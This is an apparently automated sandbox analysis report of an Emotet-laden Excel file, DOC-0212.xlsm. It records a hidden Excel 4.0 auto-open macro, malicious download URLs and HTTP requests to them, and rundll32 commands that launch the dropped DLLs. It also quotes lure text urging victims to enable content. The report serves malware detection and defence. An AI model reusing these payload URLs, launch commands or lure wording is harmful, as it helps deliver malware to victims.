Windows Analysis Report DOC-0212.xlsm

Overview

General Information

Sample Name: DOC-0212.xlsm
Analysis ID: 532596
MD5: aa4f296ed678b18394a365861777241c
SHA1: cedfd0d995958b8550f36d037c732854e23c68c5
SHA256: 20d3da22e72baf1a0e865621f9bb0af55998db0c4c534e847f30a084113eec8c
Tags: xlsm

Detection

Hidden Macro 4.0 Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Document exploit detected (drops PE files)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
Sigma detected: Emotet RunDLL32 Process Creation
Document exploit detected (creates forbidden files)
Antivirus detection for URL or domain
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Drops PE files to the user root directory
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains functionality for execution timing, often used to detect debuggers
Document misses a certain OLE stream usually present in this Microsoft Office document type
Abnormally high CPU usage
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Yara detected Xls With Macro 4.0
Drops PE files to the user directory
Excel document contains an embedded macro which executes code when the document is opened
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection:

Antivirus detection for URL or domain
Source: http://www.duoyuhudong.cn/wp-content/we8xi/vvC: Avira URL Cloud: Label: malware
Source: http://www.duoyuhudong.cn/wp-content/we8xi/ Avira URL Cloud: Label: malware
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E450927 FindFirstFileExW, 3_2_6E450927

Software Vulnerabilities:

Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: VZZdgPFp2xiOJtfpv[1].dll.0.dr
Document exploit detected (creates forbidden files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\VZZdgPFp2xiOJtfpv[1].dll
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\SysWOW64\rundll32.exe
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: sadabahar.com.np
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 194.233.67.242:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 194.233.67.242:80

Networking:

Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /wp-includes/pUMqITCt83a/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: sadabahar.com.npConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wp-content/we8xi/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.duoyuhudong.cnConnection: Keep-Alive
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100x-powered-by: PHP/7.4.25content-type: text/html; charset=UTF-8expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0link: <https://sadabahar.com.np/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encoding,User-Agentdate: Thu, 02 Dec 2021 13:31:35 GMTserver: LiteSpeed
Source: EXCEL.EXE, 00000000.00000002.753340803.00000000058F9000.00000004.00000001.sdmp String found in binary or memory: /moc.nideknil.wwwwww.linkedin.coma/3 equals www.linkedin.com (Linkedin)
Source: EXCEL.EXE, 00000000.00000002.752639955.0000000004E90000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.555654956.0000000001A80000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.694286014.0000000001DE0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.747848667.0000000002170000.00000002.00020000.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: EXCEL.EXE, 00000000.00000002.753340803.00000000058F9000.00000004.00000001.sdmp String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: EXCEL.EXE, 00000000.00000002.752639955.0000000004E90000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.555654956.0000000001A80000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.694286014.0000000001DE0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.747848667.0000000002170000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com
Source: EXCEL.EXE, 00000000.00000002.752639955.0000000004E90000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.555654956.0000000001A80000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.694286014.0000000001DE0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.747848667.0000000002170000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com/
Source: EXCEL.EXE, 00000000.00000002.752793824.0000000005077000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.556804981.0000000001C67000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.694499141.0000000001FC7000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.748132714.0000000002357000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: EXCEL.EXE, 00000000.00000002.752793824.0000000005077000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.556804981.0000000001C67000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.694499141.0000000001FC7000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.748132714.0000000002357000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: EXCEL.EXE, 00000000.00000002.754587986.0000000006CCA000.00000004.00000001.sdmp String found in binary or memory: http://sadabahar.c
Source: EXCEL.EXE, 00000000.00000002.754587986.0000000006CCA000.00000004.00000001.sdmp String found in binary or memory: http://sadabahar.co
Source: EXCEL.EXE, 00000000.00000002.754587986.0000000006CCA000.00000004.00000001.sdmp String found in binary or memory: http://sadabahar.com
Source: EXCEL.EXE, 00000000.00000002.754587986.0000000006CCA000.00000004.00000001.sdmp String found in binary or memory: http://sadabahar.com.n
Source: EXCEL.EXE, 00000000.00000002.754587986.0000000006CCA000.00000004.00000001.sdmp String found in binary or memory: http://sadabahar.com.np/w
Source: EXCEL.EXE, 00000000.00000002.754587986.0000000006CCA000.00000004.00000001.sdmp String found in binary or memory: http://sadabahar.com.np/wp-i
Source: EXCEL.EXE, 00000000.00000002.754587986.0000000006CCA000.00000004.00000001.sdmp String found in binary or memory: http://sadabahar.com.np/wp-inc
Source: EXCEL.EXE, 00000000.00000002.754587986.0000000006CCA000.00000004.00000001.sdmp String found in binary or memory: http://sadabahar.com.np/wp-inclu
Source: EXCEL.EXE, 00000000.00000002.754587986.0000000006CCA000.00000004.00000001.sdmp String found in binary or memory: http://sadabahar.com.np/wp-include%http://sadabahar.com.np/wp-includes/p
Source: EXCEL.EXE, 00000000.00000002.754587986.0000000006CCA000.00000004.00000001.sdmp String found in binary or memory: http://sadabahar.com.np/wp-includes/pUM)http://sadabahar.com.np/wp-includes/pUMqI
Source: EXCEL.EXE, 00000000.00000002.754587986.0000000006CCA000.00000004.00000001.sdmp String found in binary or memory: http://sadabahar.com.np/wp-includes/pUMqITC-http://sadabahar.com.np/wp-includes/pUMqITCt8/http://sad
Source: EXCEL.EXE, 00000000.00000002.753115851.0000000005830000.00000004.00000001.sdmp String found in binary or memory: http://sadabahar.com.np/wp-includes/pUMqITCt83a/A
Source: EXCEL.EXE, 00000000.00000002.753115851.0000000005830000.00000004.00000001.sdmp String found in binary or memory: http://sadabahar.com.np/wp-includes/pUMqITCt83a/J
Source: EXCEL.EXE, 00000000.00000002.755705830.00000000076B6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.755761363.00000000077A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.755597197.0000000007156000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.755747208.0000000007776000.00000004.00000001.sdmp String found in binary or memory: http://schemas.open
Source: EXCEL.EXE, 00000000.00000002.755705830.00000000076B6000.00000004.00000001.sdmp String found in binary or memory: http://schemas.openformatrg/drawml/2006/spreadsheetD
Source: EXCEL.EXE, 00000000.00000002.755597197.0000000007156000.00000004.00000001.sdmp String found in binary or memory: http://schemas.openformatrg/package/2006/content-t
Source: EXCEL.EXE, 00000000.00000002.755761363.00000000077A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.755747208.0000000007776000.00000004.00000001.sdmp String found in binary or memory: http://schemas.openformatrg/package/2006/r
Source: rundll32.exe, 00000006.00000002.694740490.00000000027B0000.00000002.00020000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: EXCEL.EXE, 00000000.00000002.752793824.0000000005077000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.556804981.0000000001C67000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.694499141.0000000001FC7000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.748132714.0000000002357000.00000002.00020000.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: EXCEL.EXE, 00000000.00000002.752793824.0000000005077000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.556804981.0000000001C67000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.694499141.0000000001FC7000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.748132714.0000000002357000.00000002.00020000.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: rundll32.exe, 00000006.00000002.694740490.00000000027B0000.00000002.00020000.sdmp String found in binary or memory: http://www.%s.comPA
Source: EXCEL.EXE, 00000000.00000002.753115851.0000000005830000.00000004.00000001.sdmp String found in binary or memory: http://www.duoyuhudong.cn/wp-content/we8xi/
Source: EXCEL.EXE, 00000000.00000002.747914705.000000000046C000.00000004.00000020.sdmp String found in binary or memory: http://www.duoyuhudong.cn/wp-content/we8xi/vvC:
Source: EXCEL.EXE, 00000000.00000002.752639955.0000000004E90000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.555654956.0000000001A80000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.694286014.0000000001DE0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.747848667.0000000002170000.00000002.00020000.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: EXCEL.EXE, 00000000.00000002.752793824.0000000005077000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.556804981.0000000001C67000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.694499141.0000000001FC7000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.748132714.0000000002357000.00000002.00020000.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: EXCEL.EXE, 00000000.00000002.752639955.0000000004E90000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.555654956.0000000001A80000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.694286014.0000000001DE0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.747848667.0000000002170000.00000002.00020000.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000007.00000002.747848667.0000000002170000.00000002.00020000.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E8FA61E5.png
Source: unknown DNS traffic detected: queries for: sadabahar.com.np

E-Banking Fraud:

Yara detected Emotet
Source: Yara match File source: 3.2.rundll32.exe.2ab960.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.2ab960.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.1ec0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.1ec0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.558061657.0000000001EC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.692050034.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.555217971.000000000029D000.00000004.00000020.sdmp, type: MEMORY

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: ENABLE EDITING" FROM YELLOW BAR ABOVE 5 Once you have enabled editing. please click "Enable Content
Source: Screenshot number: 4 Screenshot OCR: protected documents. 3 4 CLICK "ENABLE EDITING" FROM YELLOW BAR ABOVE 5 Once you have enabled edi
Source: Screenshot number: 4 Screenshot OCR: Enable Content" button 6 7 8 9 ,, G' 11 12 13 14 15 16 17 18 ^
Source: Screenshot number: 8 Screenshot OCR: ENABLE EDITING" FROM YELLOW BAR ABOVE 5 Once you have enabled editing. please click "Enable Content
Source: Screenshot number: 8 Screenshot OCR: protected documents. 3 4 CLICK "ENABLE EDITING" FROM YELLOW BAR ABOVE 5 Once you have enabled edi
Source: Screenshot number: 8 Screenshot OCR: Enable Content" button 6 7 8 9 10 11 12 13 14 15 16 17 18 ^
Source: Document image extraction number: 0 Screenshot OCR: ENABLE EDITING" FROM YELLOW BAR ABOVE Once you have enabled editing, please click "Enable Content"
Source: Document image extraction number: 0 Screenshot OCR: protected documents. CLICK "ENABLE EDITING" FROM YELLOW BAR ABOVE Once you have enabled editing, p
Source: Document image extraction number: 0 Screenshot OCR: Enable Content" button
Source: Document image extraction number: 1 Screenshot OCR: ENABLE EDITING" FROM YELLOW BAR ABOVE Once you have enabled editing, please click "Enable Content"
Source: Document image extraction number: 1 Screenshot OCR: protected documents. CLICK "ENABLE EDITING" FROM YELLOW BAR ABOVE Once you have enabled editing, p
Source: Document image extraction number: 1 Screenshot OCR: Enable Content" button
Office process drops PE file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\besta.ocx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\VZZdgPFp2xiOJtfpv[1].dll
Creates files inside the system directory
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Hisdtuljbeshqtad\
Detected potential crypto function
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_001B590E 6_2_001B590E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_001B3D0C 6_2_001B3D0C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_001BBF0C 6_2_001BBF0C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_001AF73B 6_2_001AF73B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_001BCD35 6_2_001BCD35
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_001AA92F 6_2_001AA92F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_001B6540 6_2_001B6540
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_001C0370 6_2_001C0370
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_001ABD61 6_2_001ABD61
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_001B1591 6_2_001B1591
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_001AB191 6_2_001AB191
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_001A7795 6_2_001A7795
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_001A358B 6_2_001A358B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_001A8D80 6_2_001A8D80
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_001A4B81 6_2_001A4B81
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_001B85B8 6_2_001B85B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_001A43BE 6_2_001A43BE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_001A59BF 6_2_001A59BF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_001BD7BE 6_2_001BD7BE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_001BE3B5 6_2_001BE3B5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_001B89A2 6_2_001B89A2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_001BE5A7 6_2_001BE5A7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_001BDDA5 6_2_001BDDA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_001B0BA4 6_2_001B0BA4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_001A75D2 6_2_001A75D2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_001A19C0 6_2_001A19C0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_001BEDED 6_2_001BEDED
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_001A51EC 6_2_001A51EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_001AA3E7 6_2_001AA3E7
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 6E44AC90 appears 33 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 6E431DE0 appears 97 times
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: CC82.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Abnormal high CPU Usage
Source: C:\Windows\SysWOW64\rundll32.exe Process Stats: CPU usage > 98%
Found a hidden Excel 4.0 Macro sheet
Source: DOC-0212.xlsm Macro extractor: Sheet name: Buk2
Source: DOC-0212.xlsm Macro extractor: Sheet name: Buk5
Source: DOC-0212.xlsm Macro extractor: Sheet name: Buk1
Source: DOC-0212.xlsm Macro extractor: Sheet name: Buk7
Source: DOC-0212.xlsm Macro extractor: Sheet name: EFEWF
Source: DOC-0212.xlsm Macro extractor: Sheet name: Buk3
Source: DOC-0212.xlsm Macro extractor: Sheet name: Buk4
Source: DOC-0212.xlsm Macro extractor: Sheet name: Buk6
Excel document contains an embedded macro which executes code when the document is opened
Source: workbook.xml Binary string: \Desktop\Fil\1d\Cir\" xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac"/></mc:Choice></mc:AlternateContent><xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{D6BAC37D-0CE8-4F19-A286-32FB1AEC3273}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/><bookViews><workbookView xWindow="-120" yWindow="-120" windowWidth="20730" windowHeight="11160" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/></bookViews><sheets><sheet name="Sheet" sheetId="1" r:id="rId1"/><sheet name="Ss1" sheetId="2" state="hidden" r:id="rId2"/><sheet name="Ss1br2" sheetId="3" state="hidden" r:id="rId3"/><sheet name="Ssbr3" sheetId="4" state="hidden" r:id="rId4"/><sheet name="EFEWF" sheetId="5" state="hidden" r:id="rId5"/><sheet name="Buk1" sheetId="6" state="hidden" r:id="rId6"/><sheet name="Buk2" sheetId="7" state="hidden" r:id="rId7"/><sheet name="Buk3" sheetId="8" state="hidden" r:id="rId8"/><sheet name="Buk4" sheetId="9" state="hidden" r:id="rId9"/><sheet name="Buk5" sheetId="10" state="hidden" r:id="rId10"/><sheet name="Buk6" sheetId="11" state="hidden" r:id="rId11"/><sheet name="Buk7" sheetId="12" state="hidden" r:id="rId12"/></sheets><definedNames><definedName name="LKLW">EFEWF!$D$3</definedName><definedName name="SASA">EFEWF!$D$17</definedName><definedName name="SASA1">EFEWF!$D$19</definedName><definedName name="SASA2">EFEWF!$D$21</definedName><definedName name="_xlnm.Auto_Open">EFEWF!$D$1</definedName></definedNames><calcPr calcId="191029"/><extLst><ext uri="{B58B0392-4F1F-4190-BB64-5DF3571DCE5F}" xmlns:xcalcf="http://schemas.microsoft.com/office/spreadsheetml/2018/calcfeatures"><xcalcf:calcFeatures><xcalcf:feature name="microsoft.com:RD"/><xcalcf:feature name="microsoft.com:FV"/></xcalcf:calcFeatures></ext></extLst></workbook>
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.6051013889
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\besta.ocx",Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hisdtuljbeshqtad\zvklxm.vbc",qEPqGlpBy
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.6051013889
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\besta.ocx",Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hisdtuljbeshqtad\zvklxm.vbc",qEPqGlpBy
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$DOC-0212.xlsm
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRDD92.tmp
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSM@8/7@2/2
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.6051013889
Source: EXCEL.EXE, 00000000.00000002.752639955.0000000004E90000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.555654956.0000000001A80000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.694286014.0000000001DE0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.747848667.0000000002170000.00000002.00020000.sdmp Binary or memory string: .VBPud<_
Source: Window Recorder Window detected: More than 3 window changes detected
Source: DOC-0212.xlsm Initial sample: OLE zip file path = xl/worksheets/sheet4.xml
Source: DOC-0212.xlsm Initial sample: OLE zip file path = xl/media/image1.png
Source: DOC-0212.xlsm Initial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: DOC-0212.xlsm Initial sample: OLE zip file path = xl/worksheets/_rels/sheet3.xml.rels
Source: DOC-0212.xlsm Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: DOC-0212.xlsm Initial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin
Source: DOC-0212.xlsm Initial sample: OLE zip file path = xl/calcChain.xml
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: CC82.tmp.0.dr Initial sample: OLE indicators vbamacros = False

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_01EC13E7 push esi; retf 3_2_01EC13F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E456A93 push ecx; ret 3_2_6E456AA6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_001A13E7 push esi; retf 6_2_001A13F0
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E43E690 WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,CreateMutexA,CloseHandle,ReleaseMutex, 3_2_6E43E690

Persistence and Installation Behavior:

Drops PE files
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Hisdtuljbeshqtad\zvklxm.vbc (copy)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\besta.ocx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\VZZdgPFp2xiOJtfpv[1].dll
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Hisdtuljbeshqtad\zvklxm.vbc (copy)
Drops PE files to the user directory
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\besta.ocx

Boot Survival:

Drops PE files to the user root directory
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\besta.ocx

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Hisdtuljbeshqtad\zvklxm.vbc:Zone.Identifier read attributes | delete
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
